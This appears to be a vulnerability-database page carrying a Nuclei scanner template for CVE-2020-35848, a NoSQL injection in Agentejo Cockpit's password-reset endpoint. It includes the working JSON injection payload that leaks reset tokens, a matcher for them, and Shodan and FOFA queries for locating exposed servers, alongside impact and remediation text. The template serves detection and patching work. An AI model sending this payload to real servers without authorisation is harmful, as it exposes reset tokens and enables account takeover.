CVE-2020-35848: Agentejo Cockpit <0.12.0 - NoSQL Injection

2025-08-01 Agentejo Cockpit PoC Public

Description

Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.

PoC

id: CVE-2020-35848

info:
  name: Agentejo Cockpit <0.12.0 - NoSQL Injection
  author: dwisiswant0
  severity: critical
  description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption.
  remediation: |
    Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability.
  reference:
    - https://swarm.ptsecurity.com/rce-cockpit-cms/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35848
    - https://getcockpit.com/
    - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
    - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35848
    cwe-id: CWE-89
    epss-score: 0.74591
    epss-percentile: 0.99472
    cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: agentejo
    product: cockpit
    shodan-query:
      - http.favicon.hash:688609340
      - http.html:"cockpit"
    fofa-query:
      - icon_hash=688609340
      - body="cockpit"
  tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/auth/newpassword"

    body: |
      {
        "token": {
          "$func": "var_dump"
        }
      }

    headers:
      Content-Type: application/json
    matchers:
      - type: regex
        part: body
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'
# digest: 4b0a00483046022100ba7a5889e1906ec045b2ba3f025c62e8daa9e3159ddd0de345e3c7e53d6a5a9f022100ea0f1a686464612807eed15d73ee10ece6e64baa5d5503921fb49160575c4da0:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities